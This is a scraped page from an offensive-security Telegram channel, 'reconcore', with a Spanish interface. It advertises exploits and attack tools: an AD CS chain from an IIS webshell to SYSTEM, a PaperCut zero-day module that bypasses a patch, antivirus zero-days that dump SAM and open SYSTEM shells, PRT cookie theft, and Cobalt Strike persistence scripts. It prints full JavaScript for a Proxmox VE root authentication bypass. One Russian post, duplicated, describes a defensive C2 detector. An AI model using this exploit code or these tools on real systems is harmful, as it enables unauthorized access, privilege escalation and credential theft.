es
Feedback
reconcore

reconcore

Ir al canal en Telegram

#vulnerability #research #cve #rce #lpe #poc #tools #pentest #redteam #blueteam #offensivesecurity #technique #methods Educational use only. Content from public sources. Admin holds no liability for misuse. Users are solely responsible for their actions.

Mostrar más
2 418
Suscriptores
+224 horas
+77 días
+9530 días
Archivo de publicaciones
Certi-Bhai — IIS AppPool → NT AUTHORITY\SYSTEM via AD CS RPC A webshell under IIS AppPool\DefaultAppPool can enroll against t
Certi-Bhai — IIS AppPool → NT AUTHORITY\SYSTEM via AD CS RPC
A webshell under IIS AppPool\DefaultAppPool can enroll against the ADCS RPC endpoint and come back with a certificate for the host machine account. Outbound domain traffic from a virtual AppPool identity is authenticated as HOST$, so the default Machine template treats the CSR as a legitimate computer enrollment. The issued cert produces a PKINIT TGT for that machine account. S4U2Self turns it into an Administrator CIFS ticket on the same box, which is local SYSTEM-equivalent access and a path to hash dump. Potato-family impersonation is not part of the chain.
Privilege escalation from IIS AppPool to NT Authority/SYSTEM via AD CS RPC endpoint #ad #adcs #windows #toolkit @reconcore

Proxmox VE PVE 7.4 auth-bypass exploit // PVE 7.4 auth-bypass @reconcore 2026 // First, make sure to try logging in as root w
Proxmox VE PVE 7.4 auth-bypass exploit
// PVE 7.4 auth-bypass @reconcore 2026
// First, make sure to try logging in as root with this exact password: root@pam
(async () => {
    const form = new URLSearchParams({
        username: "root@pam",
        password: "root@pam",
        "tfa-challenge": "RECONCORE-CHALLENGE",
    });
    const loginResponse = await fetch("/api2/json/access/ticket", {
        method: "POST",
        credentials: "omit",
        headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" },
        body: form,
    });
    const loginBody = await loginResponse.json();
    document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`;
    location.reload()
})();
#bypass @reconcore

Exploit module for the recent PaperCut MF/NG 0day CVE-2026-81578 + CVE-2026-82078 Module supports both MF and NG editions, an
Exploit module for the recent PaperCut MF/NG 0day CVE-2026-81578 + CVE-2026-82078
Module supports both MF and NG editions, and all supported product versions 26.x, 25.x, 24.x. Bypasses vendor emergency patch v1. Emergency patch v2 successfully remediates the chain. Module also has platform agnostic Java payload support (and that will be in-memory on 26.x targets), along with OS command based payloads.
PaperCut NG/MF Critical Zero-Day Exploited in the Wild #vulnerability #payload #zeroday #bypass @reconcore

NoMoreSACL
Enumerate User and Computer Objects via SAMR Protocol and Evade SACL Logging simultaneously
#poc #ad @reconcore

C2 Traffic Anomaly Detector Скрипт продавался за 1200$ а на многих «закрытых форумах» и сейчас продается. - Анализирует PCAP-файлы (дампы трафика). - Ищет аномальные DNS-запросы (DGA, длинные поддомены, low TTL). - Обнаруживает подозрительные TLS сертификаты (самоподписанные, срок < 7 дней, необычные issuer). - Выявляет регулярные интервалы между пакетами (beaconing). - Строит граф связей между внутренними IP и внешними хостами.
этот скрипт — инструмент для анализа сетевого трафика (PCAP-файлов) с целью обнаружения признаков C2-коммуникации.
Он не атакует, не взламывает, не обходит защиту. Он читает сохранённый трафик и ищет в нём аномалии, которые могут указывать на работу вредоносного ПО (бэкдоры, RAT, майнеры, шифровальщики) или на утечку данных.

C2 Traffic Anomaly Detector Скрипт продавался за 1200$ а на многих «закрытых форумах» и сейчас продается. - Анализирует PCAP-файлы (дампы трафика). - Ищет аномальные DNS-запросы (DGA, длинные поддомены, low TTL). - Обнаруживает подозрительные TLS сертификаты (самоподписанные, срок < 7 дней, необычные issuer). - Выявляет регулярные интервалы между пакетами (beaconing). - Строит граф связей между внутренними IP и внешними хостами.
этот скрипт — инструмент для анализа сетевого трафика (PCAP-файлов) с целью обнаружения признаков C2-коммуникации.
Он не атакует, не взламывает, не обходит защиту. Он читает сохранённый трафик и ищет в нём аномалии, которые могут указывать на работу вредоносного ПО (бэкдоры, RAT, майнеры, шифровальщики) или на утечку данных.

PrettyPrague GenDigital Avast Antivirus ZeroDay Elevation of Privileges Vulnerability Another zeroday in an antimalware provi
PrettyPrague
GenDigital Avast Antivirus ZeroDay Elevation of Privileges Vulnerability Another zeroday in an antimalware provider, I'm not sure but I believe this vulnerability affect other GenDigital products as well (such as AVG, Norton...) For now the PoC is compatible with any version of Avast Antivirus. The PoC will dump the SAM database by abusing a vulnerability in Avast Sandbox and spawn a full SYSTEM shell, at the time of writing this the PoC works with fully patched Avast Antivirus + Patched Windows 11 25H2
#vulnerability #elevate #poc #zeroday #av @reconcore

HardBreacher Kaspersky Antivirus For Endpoint ZeroDay Elevation of Privileges Vulnerability #vulnerability #zeroday #elevatio
HardBreacher
Kaspersky Antivirus For Endpoint ZeroDay Elevation of Privileges Vulnerability
#vulnerability #zeroday #elevation @reconcore

PRTremote Extract PRT cookies remotely with InteractiveToken Scheduled Tasks PRTremote: Extract PRT Cookies Remotely with Int
PRTremote
Extract PRT cookies remotely with InteractiveToken Scheduled Tasks
PRTremote: Extract PRT Cookies Remotely with InteractiveToken Scheduled Tasks #technique #injection #ad @reconcore

Manic: Blend between Banking Malware & Spyware is a new Android banking malware and mobile spyware: https://www.threatfabric.com/blogs/manic-blend-between-banking-malware-and-spyware

+1
Two members of TeamPCP, Ruben Ian Thomson, 21, and Louis Michael Gaebler, 23, were arrested in Perth, Australia. The group is known for its attacks on the npm supply chain, including the Shai-Hulud worm.

CobaltStrike_CNA 使用多种WinAPI进行权限维持的CobaltStrike脚本,包含API设置系统服务,设置计划任务,管理用户等。 #adduser #plugin #pentest #sheduler #wmi @reconcor
CobaltStrike_CNA
使用多种WinAPI进行权限维持的CobaltStrike脚本,包含API设置系统服务,设置计划任务,管理用户等。
#adduser #plugin #pentest #sheduler #wmi @reconcore

CS-EDR-Enumeration
Cobalt Strike Aggressor Script for identifying security products on Windows hosts — six enumeration methods rated by noise level, from silent in-process BOF to full PowerShell/WMI.
#aggressor #bof #edr #post_exploitation #offensivesecurity #purpleteam #redteam @reconcore

CS-EDR-Enumeration
🛡 Enumerate AV, EPP, EDR, and telemetry on Windows hosts using low-noise Cobalt Strike commands for tailored risk-based assessment.
#aggressor #bof #edr #post_exploitation #offensivesecurity #purpleteam #redteam @reconcore

ᴄʏʙᴇʀsᴘᴀᴄᴇ sᴏꜰᴛᴡᴀʀᴇ ᴄᴏᴍᴍᴀɴᴅ ᴀɴᴅ ᴄᴏɴᴛʀᴏʟ ──────────────────── ʀᴇᴄᴏɴ ᴄᴏʀᴇ ʟᴀʙ
ᴄʏʙᴇʀsᴘᴀᴄᴇ sᴏꜰᴛᴡᴀʀᴇ ᴄᴏᴍᴍᴀɴᴅ ᴀɴᴅ ᴄᴏɴᴛʀᴏʟ ──────────────────── ʀᴇᴄᴏɴ ᴄᴏʀᴇ ʟᴀʙ